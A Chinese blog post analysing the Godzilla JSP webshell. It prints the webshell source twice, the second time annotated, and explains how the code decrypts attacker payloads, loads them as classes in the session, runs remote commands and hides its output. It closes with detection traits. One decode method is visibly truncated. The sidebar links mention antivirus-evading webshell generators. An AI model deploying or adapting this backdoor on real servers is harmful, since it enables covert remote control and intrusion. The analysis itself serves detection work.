哥斯拉jsp马分析

最新推荐文章于 2024-05-22 11:10:41 发布
最新推荐文章于 2024-05-22 11:10:41 发布
阅读量6.1k 收藏 13
点赞数 3
分类专栏: 木马分析 安全渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zeros__/article/details/111613134
版权

前言:

这篇文章分析了哥斯拉jsp马的特征原理,写这篇文章的初衷在提高对哥斯拉马的识别、改造能力。
笔者接触安全的时间较短,难免会有疏漏,恳请发现问题的大佬给予指正。

哥斯拉PHP马解析可以看这篇文章:
https://blog.csdn.net/zeros__/article/details/111521314

正文:

贴一下哥斯拉的jsp马:

 <  % !String xc = "3c6e0b8a9c15224a";
String pass = "pass";
String md5 = md5(pass + xc);
class X extends ClassLoader { 
    public X(ClassLoader z) { 
        super(z);	
    }
    public Class Q(byte[]cb) { 
        return super.defineClass(cb, 0, cb.length);
    }
}
public byte[]x(byte[]s, boolean m) { 
    try {
        javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); 
        c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); 
        return c.doFinal(s); 
    } catch (Exception e) {
        return null;
    }
}
public static String md5(String s) { 
    String ret = null;
    try {
        java.security.MessageDigest m;
        m = java.security.MessageDigest.getInstance("MD5");
        m.update(s.getBytes(), 0, s.length());
        ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {}
    return ret;
}
public static String base64Encode(byte[]bs)throws Exception { 
    Class base64;
    String value = null;
    try {
        base64 = Class.forName("java.util.Base64");
        Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
        value = (String)Encoder.getClass().getMethod("encodeToString", new Class[]{
            byte[].class
        }).invoke(Encoder, new Object[]{
            bs
        });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Encoder");
            Object Encoder = base64.newInstance();
            value = (String)Encoder.getClass().getMethod("encode", new Class[]{
                byte[].class
            }).invoke(Encoder, new Object[]{
                bs
            });
        } catch (Exception e2) {}
    }
    return value;
}
public static byte[]base64Decode(String bs)throws Exception { 
    Class base64; 
    byte[]value = null;
    try {
        base64 = Class.forName("java.util.Base64");
            bs
        });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[]{
                String.class
            }).invoke(decoder, new Object[]{
                bs
            });
        } catch (Exception e2) {}
    }
    return value;
}
 %  >  <  % try {  
    byte[]data = base64Decode(request.getParameter(pass)); 
    data = x(data, false); 
    if (session.getAttribute("payload") == null) { 
        session.setAttribute("payload", new X(pageContext.getClass().getClassLoader()).Q(data)); 
    } else {
        request.setAttribute("parameters", new String(data)); 
        Object f = ((Class)session.getAttribute("payload")).newInstance();
        f.equals(pageContext);
        response.getWriter().write(md5.substring(0, 16));
        response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {}
%  >

分析下每个方法的作用,每个方法的作用可以看备注:

 <  % !String xc = "3c6e0b8a9c15224a";
String pass = "pass";
String md5 = md5(pass + xc);
class X extends ClassLoader { //继承ClassLoader类(继承类构造器)
    public X(ClassLoader z) { 
        super(z);	//调用ClassLoader的构造函数
    }
    public Class Q(byte[]cb) { 
        return super.defineClass(cb, 0, cb.length);// 把字节码转化为Class
    }
}
public byte[]x(byte[]s, boolean m) { //对指定字符串进行AES加解密
    try {
        javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES"); //获取AES加密器
        c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(xc.getBytes(), "AES")); //指定加密器密钥,进行加解密
        return c.doFinal(s);  //返回加密后的字符串
    } catch (Exception e) {
        return null;
    }
}
public static String md5(String s) { //某单向加密算法,根据某字符串返回唯一值
    String ret = null;
    try {
        java.security.MessageDigest m;
        m = java.security.MessageDigest.getInstance("MD5");
        m.update(s.getBytes(), 0, s.length());
        ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {}
    return ret;
}
public static String base64Encode(byte[]bs)throws Exception { //base64加密
    Class base64;
    String value = null;
    try {
        base64 = Class.forName("java.util.Base64");
        Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
        value = (String)Encoder.getClass().getMethod("encodeToString", new Class[]{
            byte[].class
        }).invoke(Encoder, new Object[]{
            bs
        });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Encoder");
            Object Encoder = base64.newInstance();
            value = (String)Encoder.getClass().getMethod("encode", new Class[]{
                byte[].class
            }).invoke(Encoder, new Object[]{
                bs
            });
        } catch (Exception e2) {}
    }
    return value;
}
public static byte[]base64Decode(String bs)throws Exception { //base64解密
    Class base64; 
    byte[]value = null;
    try {
        base64 = Class.forName("java.util.Base64");
            bs
        });
    } catch (Exception e) {
        try {
            base64 = Class.forName("sun.misc.BASE64Decoder");
            Object decoder = base64.newInstance();
            value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[]{
                String.class
            }).invoke(decoder, new Object[]{
                bs
            });
        } catch (Exception e2) {}
    }
    return value;
}
 %  >  <  % try {  
    byte[]data = base64Decode(request.getParameter(pass)); //监听传参并解密
    data = x(data, false); //解密荷载,远控命令
    if (session.getAttribute("payload") == null) { 
        session.setAttribute("payload", new X(pageContext.getClass().getClassLoader()).Q(data)); //将攻击荷载保存到session中
    } else {
        request.setAttribute("parameters", new String(data)); //将解密后远控命令转发给自己,储存在pageContext中(免杀1)
        Object f = ((Class)session.getAttribute("payload")).newInstance();//将攻击荷载创建成class 
        f.equals(pageContext);//执行远控命令(免杀2)
        response.getWriter().write(md5.substring(0, 16));//对传入的字符串加密后取前16位,输出在回显前(二次加密),其余的加在回显后面
        response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));//通过f的toString()方法获取远控命令执行后的返回值,加密后输出给哥斯拉服务端
        response.getWriter().write(md5.substring(16));
    }
} catch (Exception e) {}
%  >

接下来是分析过程:

木马一开始的class X是一个类构造器,用于将字符串格式的攻击荷载创建成类。

定义的x()方法用于AES加解密(划重点,带AES的木马不一定是冰蝎还有可能是哥斯拉)。

md5()用来根据指定字符串,生成加密后的字符串,生成后的字符串是无法解密的。在木马起到的功能是通过加密的方式完成服务端校验,以及对返回值的二次加密。

base64Encode()和base64Decode()两个方法本别用来进行base64加解密。

一行一行看存储、利用攻击荷载的部分:

 byte[]data = base64Decode(request.getParameter(pass));

通过request.getParameter()方法监听通过http协议提交过来的数据,取出名为pass的变量(即该哥斯拉马对应的密码)的值,通过base64解密后存储到data中。

data = x(data, false);

二次解密攻击荷载/远控命令

  if (session.getAttribute("payload") == null) { 
        session.setAttribute("payload", new X(pageContext.getClass().getClassLoader()).Q(data)); //将攻击荷载保存到session中

如果session中应该保存攻击荷载的地方现在是空的,存储传入的字符串到session中(储存攻击荷载)。

request.setAttribute("parameters", new String(data));

通过request.setAttribute()方法转发解密后的请求给自己。之后执行远控代码时会使用重新接收的请求。这一步从代码层面上应该没有什么特殊意义,但是可以起到免杀的作用。

 Object f = ((Class)session.getAttribute("payload")).newInstance();//将攻击荷载创建成class

从session中取出攻击荷载,用之前定义的类构造器X方法将字符串格式的攻击荷载转化成字符串格式。

 f.equals(pageContext);

通过攻击荷载执行远控命令。

response.getWriter().write(md5.substring(0, 16));

通过自定义的MD5()方法加密传入的远控命令,取前16位放在返回值前面。这是因为返回值经过了bash64加密,所以可以通过在其前后都添加字符串的形式进行二次加密。如果不知道前后添加了多少字符串,就无法进行解密。

response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)))

通过f的toString()方法获取远控命令执行后的返回值,加密后输出给哥斯拉服务端

response.getWriter().write(md5.substring(16));

取上上行加密后剩下的部分,放在返回值的后面(二次加密)。

} catch (Exception e) {}

以上代码执行时忽略异常,执行失败不告警。

总结一下jsp哥斯拉的一些特征。
1)会调用javax.crypto.Cipher.getInstance()进行AES加密。加密时使用的盐值是固定好的。
2)可能会定义某单向加密算法,也可能直接使用MD5()或冰蝎加密。
3)攻击荷载存储在session中,会有一个向session存储荷载的步骤
4)会通过攻击荷载中的equals命令执行远控命令。
5)会在返回值前插入一个16位长的字符串。插入的字符串和传入的参数有关。
6)通过攻击荷载中的toString()获取执行结果。

以上几点涉及到了服务端的运行逻辑、应该在改造、变形木马时很难隐藏。

zeros__
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
jsp集合[自用,莫下]
04-27
jsp集合 WAR JSP一句话 JSP一句话 jsp集合 WAR
哥斯拉jsp/jspx免杀webshell生成器
潇湘信安的博客
07-19 1014
本工具是根据“那些牛那些事儿”一文中的本质部分写的一个哥斯拉java类型webshell生成工具,已测试可过:360、火绒、D盾,其他的自己去测下。
vulhub——ActiveMQ漏洞
最新发布
qq_55202378的博客
05-22 1112
所以,只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。允许具有代理网络访问权限的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而使代理实例化类路径上的任何类”,问题的根本原因是不安全的反序列化。默认的ActiveMQ账号密码均为admin,首先访问。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。:程序没有限制可在代理中序列化的类,远程攻击者可借助特制的序列化的。
冰蝎、蚁剑和哥斯拉
m0_62207482的博客
04-24 477
它的原理是通过将一个类似于Webshell的脚本注入到Web服务器上,然后在客户端通过HTTP/HTTPS协议与注入的脚本进行通信,从而实现对被攻击端的远程控制。攻击者首先在受害者机器上植入后门,然后将后门与攻击者自己的服务器建立连接,从而可以通过Java Web服务器进行远程控制。哥斯拉是一款基于Go语言开发的网络安全检测平台,具有漏洞扫描、资产管理、协议分析的作用,其特点是速度快、效率高、安全性好。总的来说,虽然冰蝎、蚁剑和哥斯拉在远程管理方面都有一定的功能,但它们在具体实现和功能上存在明显的差异。
文件上传 webshell 各类型 一句话木 图片 制作 教程
weixin_44286136的博客
06-05 9525
webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 小:一句话木也称为小,即整个shell代码量只有一行,一般时系统执行函数 大:代码量和功能比小多,一般会进入二次编码加密,防止被防火墙/入侵系统检测到 图片
jsp
syh_sss的博客
05-01 1342
<%@page pageEncoding="utf-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.util.regex.*"%> <%@page import="java.sql.*"%> <%@page import="java.nio.charset.*"%> <%@page import="java.
公司某应用服务器被挂挖矿病毒处理流程
weixin_41876359的博客
07-29 2445
公司某应用服务器被挂挖矿病毒处理流程 2021年7月20日 本来正在高高兴兴做项目,突然接到一个老客户的电话,跟我说他们的服务器被人植入了挖矿病毒,cpu爆满。 好家伙,客户上来给我发了个病毒扫描文件【听说是发现服务器卡顿后,安装了火绒企业版(收费)可以扫描linux主机,看来效果还不错,可以扫到很多东西】 看了下看服务器已经完全沦陷了 看了下情况,服务器目前已经是在自动连接矿池挖矿了。 1.关闭服务器连接外网的权限。 可以看到连接是从服务器主动连接到矿池的,首先关闭掉服务器连接外网的流量,不让服务
继承classLoader加载一个class文件demo
u014609356的专栏
01-22 812
public class Loader extends ClassLoader{ private String classPath; private String classname="Test"; public Loader(String classPath){ this.classPath=classPath; } @Override protected Class f
借助AI分析哥斯拉原理与Tomcat回显链路挖掘
m0_61101264的博客
09-22 105
本次分析使用了ChatGPT进行辅助分析,大大提升了工作效率,很快就分析出木的工作流程和构造出利用方式。
攻击工具分析哥斯拉(Godzilla)1
08-03
哥斯拉(Godzilla)攻击工具分析哥斯拉,这个名字听起来颇具震撼力,而在这个网络攻防的领域中,它并非电影里的巨型怪兽,而是一款强大的Webshell管理工具。哥斯拉是由Java语言编写,继承了诸如菜刀、蚁剑、冰蝎...
哥斯拉3.03.rar
08-12
webshell工具,哥斯拉
强大的webshell管理工具-哥斯拉
12-27
只有适合自己的工具,没有好坏之分,拿走不谢。
Godzilla:哥斯拉
05-10
哥斯拉内置了3种Payload以及6种加密器,6种支持脚本后缀,20个内置插件 JavaDynamicPayload JAVA_AES_BASE64 jsp jspx JAVA_AES_RAW jsp jspx CShapDynamicPayload CSHAP_AES_BASE64 aspx asmx ashx JAVA_AES_RAW aspx...
哥斯拉4.0.1.rar
03-05
哥斯拉,好用的用后门软件
关于图片的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
有图片,有木,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源码吧,过关方式也是叫我们上传图片。。。 然后我还要说吗一下,图片不是一张木图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞
RexHa的博客
02-27 2217
漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5.14.0版本以后,彻底删除了fileserver应用。访问8161端口默认账户密码admin/admin 登录文件上传成功需要有以下几点前提:知道文件上传的绝对路径网站有文件上传功能文件类型没有被限制上传的文
【后门工具】哥斯拉,YYDS#
10-09 1366
哥斯拉】生成、检测、连接木,绝活
jsp一句话木_图片木解析
weixin_39965881的博客
11-21 4382
PHP图片木 实现运行环境介绍本测试主要针对的是 IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为...
解决哥斯拉内存 pagecontext 的问题
hackzkaq的博客
04-25 1388
前言 注入内存借助当前的webshell工具而言,冰蝎可以通过创建hashmap放入request、response、session替换pagecontext来解决 HttpSession session = lastRequest.getSession(); pageContext.put(“request”, lastRequest); pageContext.put(“response”, lastResponse); pageContext.put(“session”, session); 能这么
wireshark抓包分析哥斯拉
08-04
很抱歉,根据提供的引用内容,我没有找到关于wireshark抓包分析哥斯拉的相关信息。Wireshark是一款流行的网络封包分析软件,用于截取和显示网络封包的详细信息。它可以用于分析各种网络协议的封包,但不能修改封包内容或发送封包。对于HTTP和HTTPS协议,Wireshark可以获取封包,但无法解密HTTPS内容。如果需要处理HTTP和HTTPS协议,可以考虑使用Fiddler。对于其他协议如TCP和UDP,Wireshark是一个很好的选择。流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中可能包含特定的标记和自定义的二进制协议。但是,关于wireshark抓包分析哥斯拉的具体信息,我无法提供。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值